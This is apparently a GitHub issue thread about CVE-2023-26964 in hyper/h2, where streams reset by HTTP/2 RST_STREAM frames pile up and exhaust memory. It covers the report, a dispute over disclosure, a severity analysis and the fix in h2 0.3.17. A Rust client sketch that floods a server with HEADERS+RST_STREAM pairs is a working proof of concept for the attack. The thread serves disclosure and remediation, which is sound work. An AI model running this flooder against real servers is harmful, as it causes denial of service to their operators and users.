Stream stacking occurs when h2 processes HTTP/2 RST_STREAM frames. As a result, memory and CPU usage are high. #2877
Comments
@seanmonstar What do you think of this issue? I think hyper has some problems in dealing with this scenario.
Sounds like something we could try to fix. What is making the slab hold onto the memory? My guess is that it needs to hold the stream info while there is an …
@silence-coding thanks for your code.
GH Dependabot is now also raising a security alert.
Is there anything we could do as reqwest library users to mitigate the attack surface?
Um. Ok. I'm sure you just wanted to see this fixed. But this is NOT how to do things. Filing a drive-by CVE like this is like seeing a lighter in a school and pulling the fire alarm. There is a SECURITY policy if you ever feel something is a vulnerability. Then we can better coordinate.

Be Kind. That includes considering we're all humans contributing, and respecting time is part of being kind. I'm also extremely disappointed that @github facilitated this.

That said, fire alarm time. If you're here from a dependabot warning, or similar: I'll be working on this today. I will update this issue when there is a version you can upgrade to. Some things you can do to determine if you can just safely ignore the dependabot warning:
The fix will likely be an …
This CVE is going to cause a flurry of unnecessary emergency response work across the ecosystem, even for use cases that are totally unimpacted by the bug. Every application that depends on Hyper will now have to ship out-of-cycle fixes to address the CVE, even if the application has nothing to do with HTTP/2. Going through the documented SECURITY process isn't a feel-good exercise: it allows stakeholders to coordinate about the severity and breadth of an issue's impact.
Not to pile on @github's security team, but the actual CVE is "better" insofar as it says "awaiting analysis"... The GH Security Advisory, in contrast, is unnecessarily alarming with its High Severity label...
An update: from what I can tell, the report is that the slab store of streams grows because it's holding two events. It appears that as long as the server is accepting requests, the slab is actually cleared out. Looking in the original report, I can't find what the server is doing (it's …).

Also, here's the chat thread for this: https://discord.com/channels/500028886025895936/1095696565689122967
What do you mean by "unnecessary"? Finding out whether or not you are affected isn't unnecessary. Updating to an unaffected version is not possible, because there is no unaffected version as of now; every version of hyper is potentially vulnerable. The only thing people can do is to disable the "h2" feature if they have it enabled, which would prevent this attack.
The whole point of a SECURITY policy is to respond in a reasonable way: reproduce, identify scope, write tests, prepare a fix, etc. Should we really report a CVE before confirming with the maintainers that it's 1. reproducible and 2. something that has an available fix ready to deploy? It would have been better to follow the requested SECURITY policy so that the response could be more coordinated. It's better to be sure first before declaring a vulnerability.
Exactly; additionally, there is no world in which this is a "high severity" CVE. You can use this tool to calculate the severity.
It is still very unclear whether there is a vulnerability or just an issue. The submitter claims there is one but has yet to provide a reproduction showing how they achieved that result. The maintainers have yet to reproduce it under normal conditions. The only way to reproduce seems to be either a) misusing …
We don't even have an official repro case. That's the entire point of the …
Does the issue not show how to reproduce this? I'm sorry, but I don't exactly blame the person who made the CVE here. This was reported and was marked as moderate on the CVE website. I can't imagine it's that rare of a situation for people to use HTTP/2 streams here, so I don't know why it's being minimized so much. "Be kind" should also apply to not scolding your community members. I'm sure this wasn't meant out of malice and was simply meant to bring awareness to the issue at hand. That being said, I'm seeing people refer to it being marked as high severity, but both GitHub and NIST are reporting it as moderate, which I think is fair.
GitHub initially had it marked as high. It was updated an hour ago.
No, it looks like the maintainers/contributors were having a hard time figuring out exactly how to reproduce it, where the vulnerability is, or whether it's just an API misuse. As I understand from the fire-alarm Discord thread, the large number of requests needed to reproduce in the OP's case also confuses things. In general it's not very clear how or where the vulnerability lies, and this is emergency work that the maintainers now have to perform, without even a concise repro case, instead of it being disclosed properly.

It's generally good practice to at least mention to the maintainer that you'll be filing a CVE, even if just to give advance warning, but also just to see if you are misunderstanding it. Even if it turns out to be severe, it's still best practice to communicate with maintainers about it, for all of the reasons above.
It unfortunately does not. About 4 people have been working on this all day trying to figure out what the actual reproduction of this is. This makes it quite stressful to just guess at what a fix is, when we can't confirm that's what they meant in the first place.
I acknowledged in my first comment this morning that I assume the person just wanted it fixed, not assuming they were being evil. But this is not the right way to get attention. There were several more steps that could have been taken. |
Another update: this should be classified as low severity. The attack requires sufficient bandwidth to overload Hyper's accept loop. The original submitter used 400 threads over localhost against hyper's 1 thread. This would not be easy to trigger over a network (though it is possible). Additionally, systems return to normal once the attack completes. In practice, I don't expect many to be vulnerable to such an attack due to the difficulty of triggering it via a remote network, and in terms of severity, a botnet triggering a DoS by overloading the pipe would be a greater risk. That said, the Hyper maintainers are currently investigating a patch that could mitigate this specific attack.
This is all very good to know, nice work. Just one question: why is it not easy to trigger 400 client threads over the network against 1 server thread? Seems dead simple and is what every ddos framework can do, no? Am I misinterpreting your answer maybe? Thanks for all the work from everyone involved again! It's appreciated!
It isn't a matter of threading, but of bandwidth. You can only send as many bytes as the pipe allows, and that has to be enough to saturate the hyper accept loop. This is easy enough to do over localhost, where bandwidth is arbitrarily high, but not so much over the public internet.
This is our current theory (we can't confirm it's what the original reporter meant): if you can flood the network faster than the server is able to "accept" requests, the queue of pending-to-accept-but-reset requests can keep growing. This is because the accept method is basically …

So, if it is over the network, not local, then latency, backpressure, and TCP flow control would make it harder to fill up the server's buffer faster than it can spawn a task to handle the request. But again, this is just our best guess.
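For a concrete picture of the loop shape being described, here is a minimal sketch using h2's public server API with the tokio and http crates (the address and handler body are made up for this example, not taken from the report):

```rust
// Sketch of a typical h2 accept loop: the loop only dequeues requests and
// spawns tasks; handling happens elsewhere. If a peer can enqueue
// HEADERS+RST_STREAM pairs faster than this loop runs, already-reset
// streams pile up in the pending-accept queue and memory grows.
use tokio::net::TcpListener;

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let listener = TcpListener::bind("127.0.0.1:8080").await?;
    loop {
        let (socket, _peer) = listener.accept().await?;
        tokio::spawn(async move {
            let mut conn = h2::server::handshake(socket).await.unwrap();
            // The accept loop in question: each iteration pulls one stream
            // off the pending-accept queue.
            while let Some(result) = conn.accept().await {
                let (_request, mut respond) = result.unwrap();
                tokio::spawn(async move {
                    // Hypothetical handler: reply with an empty 200.
                    let response = http::Response::new(());
                    let _ = respond.send_response(response, true);
                });
            }
        });
    }
}
```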
If that is indeed the issue, this PR means to fix it: hyperium/h2#668
The PR seems close. But, given that I've been at this for 14 hours, I'm going to go knock out. Weighing the severity against the possibility of breaking something right before I become unresponsive, it doesn't seem worth publishing at this moment.
Streams that have been received by the peer, but not accepted by the user, can also receive a RST_STREAM. This is a legitimate pattern: one could send a request and then shortly after, realize it is not needed, sending a CANCEL.

However, since those streams are now "closed", they don't count towards the max concurrent streams. So, they will sit in the accept queue, using memory.

In most cases, the user is calling `accept` in a loop, and they can accept requests that have been reset fast enough that this isn't an issue in practice. But if the peer is able to flood the network faster than the server accept loop can run (simply accepting, not processing requests; that tends to happen in a separate task), the memory could grow.

So, this introduces a maximum count for streams in the pending-accept but remotely-reset state. If the maximum is reached, a GOAWAY frame with the error code of ENHANCE_YOUR_CALM is sent, and the connection marks itself as errored.

ref CVE-2023-26964
ref GHSA-f8vr-r385-rh5r
Closes hyperium/hyper#2877
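For readers wanting to see what opting in looks like, here is a sketch assuming the `max_pending_accept_reset_streams` builder option that shipped with this fix in h2 0.3.17 (the limit of 20 is an arbitrary value for illustration; h2 applies its own default when unset):

```rust
// Sketch: cap streams sitting in the pending-accept queue that the peer
// has already reset. Exceeding the cap triggers the GOAWAY with
// ENHANCE_YOUR_CALM described above.
use tokio::net::TcpStream;

async fn serve(socket: TcpStream) -> Result<(), h2::Error> {
    let mut builder = h2::server::Builder::new();
    builder.max_pending_accept_reset_streams(20);
    let mut conn = builder.handshake::<_, bytes::Bytes>(socket).await?;
    while let Some(result) = conn.accept().await {
        let (_request, _respond) = result?;
        // Spawn per-request handling as usual...
    }
    Ok(())
}
```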
Release PR is in CI right now: hyperium/h2#670
Release is out: https://github.com/hyperium/h2/releases/tag/v0.3.17 You can run a `cargo update -p h2` to pull it in.
Submitted rustsec/advisory-db#1684.
Version
hyper-0.13.7
h2-0.2.4
Platform
WSL
Description
Summary:
Stream stacking occurs when Hyper processes HTTP/2 RST_STREAM frames. As a result, memory and CPU usage are high.
Steps:

1. Send a `HEADERS` frame to open the stream, followed by an `RST_STREAM` frame to request cancellation of the stream.
2. Create multiple threads for sending. (A client sketch follows below.)
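A minimal client-side sketch of these steps, assuming h2's public client API together with the tokio and http crates (the address, task count, and loop shape are illustrative, not the reporter's actual script):

```rust
// Hedged repro sketch: open a stream with HEADERS, immediately cancel it
// with RST_STREAM(CANCEL), and repeat from many concurrent tasks.
use h2::Reason;
use tokio::net::TcpStream;

#[tokio::main]
async fn main() {
    for _ in 0..400 {
        tokio::spawn(async {
            let tcp = TcpStream::connect("127.0.0.1:8080").await.unwrap();
            let (mut client, conn) = h2::client::handshake(tcp).await.unwrap();
            // Drive the connection I/O on its own task.
            tokio::spawn(async move {
                let _ = conn.await;
            });
            loop {
                // Wait until the connection can take another stream.
                client = client.ready().await.unwrap();
                let request = http::Request::builder()
                    .uri("http://127.0.0.1:8080/")
                    .body(())
                    .unwrap();
                // The HEADERS frame opens the stream...
                let (_response, mut stream) = client.send_request(request, true).unwrap();
                // ...and RST_STREAM(CANCEL) immediately resets it.
                stream.send_reset(Reason::CANCEL);
            }
        });
    }
    // Let the flood run for a while.
    tokio::time::sleep(std::time::Duration::from_secs(60)).await;
}
```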
Result:
The CPU usage of the Hyper server keeps increasing. As a result, the VM memory is used up.
Vulnerability analysis:
When receiving a `HEADERS` frame, `h2` stores the corresponding stream content in the `slab` and sets a frame index in the `ids`. When receiving an `RST_STREAM` frame, `h2` sets the stream to `Closed` and resets the related statistics. However, the stream memory is released only when `stream.is_released()` is true. When the `RST_STREAM` frame is received, the release is not triggered immediately. As a result, the size of the slab increases continuously.
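To illustrate the growth pattern with the standalone `slab` crate (an analogy only, not `h2`'s internal `Store`): a slot stays allocated until it is explicitly removed, so flipping a stream to `Closed` without releasing it never shrinks the slab.

```rust
// Analogy for the leak: entries survive in a slab until `remove` is
// called, so closing without releasing keeps the memory occupied.
use slab::Slab;

enum StreamState {
    Open,
    Closed,
}

fn main() {
    let mut streams: Slab<StreamState> = Slab::new();
    let mut keys = Vec::new();
    // Simulate many HEADERS+RST_STREAM pairs: each opens a slot and is
    // marked Closed, but the slot itself is never released.
    for _ in 0..10_000 {
        let key = streams.insert(StreamState::Open);
        streams[key] = StreamState::Closed; // reset received, state flipped
        keys.push(key); // ...but the entry is not removed
    }
    assert_eq!(streams.len(), 10_000); // the slab keeps stacking up
    // Releasing is what actually frees the slots.
    for key in keys {
        streams.remove(key);
    }
    assert_eq!(streams.len(), 0);
}
```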
Test procedure:

Add `slab_len()` and `ids_len()` methods to `Store` to return the lengths of all streams and active streams. Log the preceding two stream lengths in the `recv_reset()` method.

After the test, when the HEADERS frame is repeatedly sent to open a stream and the RST_STREAM frame is sent to cancel the stream, the length of the `ids` does not exceed the value of `max_recv`, but the slab keeps increasing. A stream in the `Closed` state in the slab is released only after all frames on the connection are sent.
The `max_concurrent_streams` configuration can limit `max_recv_streams`, but it appears that in this scenario, the size of the `Slab` is much larger than the `max_concurrent_streams` value and stacks up.

I think it is necessary to limit the size of the `Slab`, or to ensure that streams in the `Slab` can be released quickly after the `RST_STREAM` frame is received, to prevent such attacks.